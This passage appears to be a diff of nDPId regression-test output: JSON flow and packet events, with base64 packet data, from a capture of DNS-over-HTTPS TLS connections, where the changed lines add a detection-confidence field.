sgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="}
-00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04383{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhRVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"}
-00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 01582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8Q